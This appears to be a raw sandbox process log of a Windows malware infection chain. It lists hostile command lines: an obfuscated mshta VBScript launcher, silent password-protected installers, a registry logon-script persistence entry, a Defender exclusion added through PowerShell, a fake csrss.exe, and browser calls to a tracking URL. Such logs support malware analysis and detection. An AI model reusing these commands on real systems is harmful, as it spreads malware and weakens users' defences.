C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6220 -ip 6220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6540 -ip 6540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1240 -ip 1240
C:\Users\Admin\Documents\W7m0YvhpQdQsrfQyU7p7q4dI.exe
"C:\Users\Admin\Documents\W7m0YvhpQdQsrfQyU7p7q4dI.exe" -q
C:\Users\Admin\Documents\W5t0uEoEk1GRIhtYYmq0uTff.exe
"C:\Users\Admin\Documents\W5t0uEoEk1GRIhtYYmq0uTff.exe"
C:\Users\Admin\Documents\C770YC2B40t9rlyi5QunmqSS.exe
"C:\Users\Admin\Documents\C770YC2B40t9rlyi5QunmqSS.exe"
C:\Users\Admin\Documents\uSjH0U75WJ_KVmP5iAayIRl_.exe
"C:\Users\Admin\Documents\uSjH0U75WJ_KVmP5iAayIRl_.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 2456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6220 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 6628 -ip 6628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 3404 -ip 3404
C:\Users\Admin\Documents\E_mfWMv0qDLLKpdLmJ3MIQZ0.exe
"C:\Users\Admin\Documents\E_mfWMv0qDLLKpdLmJ3MIQZ0.exe"
C:\Users\Admin\Documents\B4FaSjIIdGGtxVhfMYWaDDEa.exe
"C:\Users\Admin\Documents\B4FaSjIIdGGtxVhfMYWaDDEa.exe"
C:\Users\Admin\Documents\qiwpJkAFgAAbnr8aSGkwzutb.exe
"C:\Users\Admin\Documents\qiwpJkAFgAAbnr8aSGkwzutb.exe"
C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe
"C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 292
C:\Users\Admin\Documents\PHYhKrBfppymYEgbuZb3eVyh.exe
"C:\Users\Admin\Documents\PHYhKrBfppymYEgbuZb3eVyh.exe"
C:\Users\Admin\AppData\Roaming\1687128.exe
"C:\Users\Admin\AppData\Roaming\1687128.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 316
C:\Users\Admin\Documents\rI67ExprUJepuTcOX5cceK3u.exe
"C:\Users\Admin\Documents\rI67ExprUJepuTcOX5cceK3u.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 560 -ip 560
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F6A6A4CADFCF8031F50FA17405F1BC59 C
C:\Users\Admin\AppData\Roaming\3258184.exe
"C:\Users\Admin\AppData\Roaming\3258184.exe"
C:\Users\Admin\Documents\WtbsazaWgtDRlV7rGnSpASwZ.exe
"C:\Users\Admin\Documents\WtbsazaWgtDRlV7rGnSpASwZ.exe"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\AppData\Local\Temp\is-QETEV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QETEV.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6428 -ip 6428
C:\Users\Admin\AppData\Roaming\3435026.exe
"C:\Users\Admin\AppData\Roaming\3435026.exe"
C:\Users\Admin\AppData\Local\Temp\6970.exe
C:\Users\Admin\AppData\Local\Temp\6970.exe
C:\Users\Admin\AppData\Local\Temp\is-BJG5E.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BJG5E.tmp\Setup.tmp" /SL5="$30234,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-QETEV.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 316
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Roaming\7736117.exe
"C:\Users\Admin\AppData\Roaming\7736117.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3BCA4FF2F037F63343DEE3423973ED24 C
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-91D2C.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\awyt2leQx6ULjCTHfhtR7jhf.exe" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 828 -ip 828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5132 -ip 5132
C:\Users\Admin\AppData\Local\Temp\is-IB9PM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-IB9PM.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403836 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 828 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 288
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\A38C.exe
C:\Users\Admin\AppData\Local\Temp\A38C.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 588 -ip 588
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 292
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-91D2C.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "awyt2leQx6ULjCTHfhtR7jhf.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4948 -ip 4948
C:\Program Files\Windows Mail\YUQNUNVYRH\ultramediaburner.exe
"C:\Program Files\Windows Mail\YUQNUNVYRH\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\1f-78e03-5de-60bbb-31a78e895881f\Catyrubaejo.exe
"C:\Users\Admin\AppData\Local\Temp\1f-78e03-5de-60bbb-31a78e895881f\Catyrubaejo.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 272
C:\Users\Admin\AppData\Local\Temp\is-29JP7.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-29JP7.tmp\ultramediaburner.tmp" /SL5="$305B4,281924,62464,C:\Program Files\Windows Mail\YUQNUNVYRH\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\d2-3311b-f57-6c3b7-7347bf8e37f81\Wuxiwibaegae.exe
"C:\Users\Admin\AppData\Local\Temp\d2-3311b-f57-6c3b7-7347bf8e37f81\Wuxiwibaegae.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 2576 -ip 2576
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\D4AF.exe
C:\Users\Admin\AppData\Local\Temp\D4AF.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 52E6F96FF560BE24BE65EFF395469ED9
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2576 -s 2352
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1D7FA75AE4E7FBB900B1F3494184279B C
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
C:\Users\Admin\AppData\Local\Temp\is-91D2C.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-91D2C.tmp\{app}\vdi_compiler"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 5148 -ip 5148
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{74789a1f-439f-0044-8848-b20c17be4268}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Users\Admin\AppData\Local\Temp\FBE0.exe
C:\Users\Admin\AppData\Local\Temp\FBE0.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 2196
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "5353"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 2176 -ip 2176
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4868 -ip 4868
C:\Users\Admin\AppData\Local\Temp\2717.exe
C:\Users\Admin\AppData\Local\Temp\2717.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2176 -s 2316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 288
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 2008 -ip 2008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 2428
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Users\Admin\AppData\Local\Temp\6421.exe
C:\Users\Admin\AppData\Local\Temp\6421.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\58a98ba8-33df-4ad9-b88a-d39d0b71d632\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\58a98ba8-33df-4ad9-b88a-d39d0b71d632\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\58a98ba8-33df-4ad9-b88a-d39d0b71d632\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Users\Admin\AppData\Local\Temp\B7A1.exe
C:\Users\Admin\AppData\Local\Temp\B7A1.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\58a98ba8-33df-4ad9-b88a-d39d0b71d632\test.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3088 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Users\Admin\AppData\Local\Temp\C3F6.exe
C:\Users\Admin\AppData\Local\Temp\C3F6.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20f146f8,0x7ffa20f14708,0x7ffa20f14718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\CCE1.exe
C:\Users\Admin\AppData\Local\Temp\CCE1.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:8
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\6421.exe
C:\Users\Admin\AppData\Local\Temp\6421.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6421.exe" -Force
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\F1FE.exe
C:\Users\Admin\AppData\Local\Temp\F1FE.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14794003825300065771,17924417010707861376,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2680 -ip 2680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2680 -s 292
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 8108 -ip 8108
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8108 -s 876
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
